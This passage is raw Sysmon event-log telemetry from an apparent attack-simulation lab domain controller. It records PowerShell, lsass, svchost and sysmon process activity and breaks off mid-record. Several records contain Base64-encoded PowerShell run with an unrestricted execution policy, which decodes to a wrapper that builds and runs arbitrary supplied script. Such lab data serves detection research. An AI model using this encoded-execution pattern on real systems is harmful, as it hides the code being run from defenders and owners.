JgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.684{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.684{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.653{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3tkaml4d.nll.ps12021-01-18 13:33:17.653 10341000x8000000000000000239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.637{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.606{59A5CD1D-8E1D-6005-C502-00000000A201}22564640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+955532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.616{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 